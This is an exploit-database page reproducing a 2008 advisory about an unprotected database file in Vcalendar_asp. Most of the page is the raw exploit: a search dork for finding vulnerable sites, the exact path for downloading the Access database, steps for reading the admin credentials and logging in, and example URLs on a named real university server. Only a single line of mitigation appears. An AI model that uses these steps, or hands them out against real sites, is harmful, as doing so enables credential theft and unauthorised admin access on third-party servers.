header-logo
Suggest Exploit
vendor:
Vcalendar_asp
by:
Swan
7.5
CVSS
HIGH
MDB Vulnerability
532
CWE
Product Name: Vcalendar_asp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vcalendar_asp Mdb Vulnerability

Vcalendar_asp is vulnerable to an MDB file download vulnerability. An attacker can download the MDB file from the server and read the admin name and password from the 'users' table. The attacker can then use the credentials to log in to the application.

Mitigation:

Ensure that the MDB file is not accessible from the web server.
Source

Exploit-DB raw data:

[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]

[+] Vcalendar_asp Mdb Vulnerability
[+]
[+] ----------------------------------------------------------
[+] Author : Swan
[+]
[+] Date : 20.11.2008
[+]
[+] Contact : Swantska@Gmail.Com
[+]
[+] -----------------------------------------------------------

Script : Vcalendar_asp

Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir

Dork : "inurl:vcalendar_asp"

Our mdb path : db/VCalendar.mdb

Exploit :

Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp

Example :

http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp

http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb

http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp

[+] ----------------------------------------------------------------------
[+] Special Thanks : str0ke & Turkish Nation
[+]
[+] Zone-h.Org & Milw0rm.Com
[+]
[+] ----------------------------------------------------------------------

[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]

# milw0rm.com [2008-11-20]

Navigation

Suggest Exploit

Services By CQR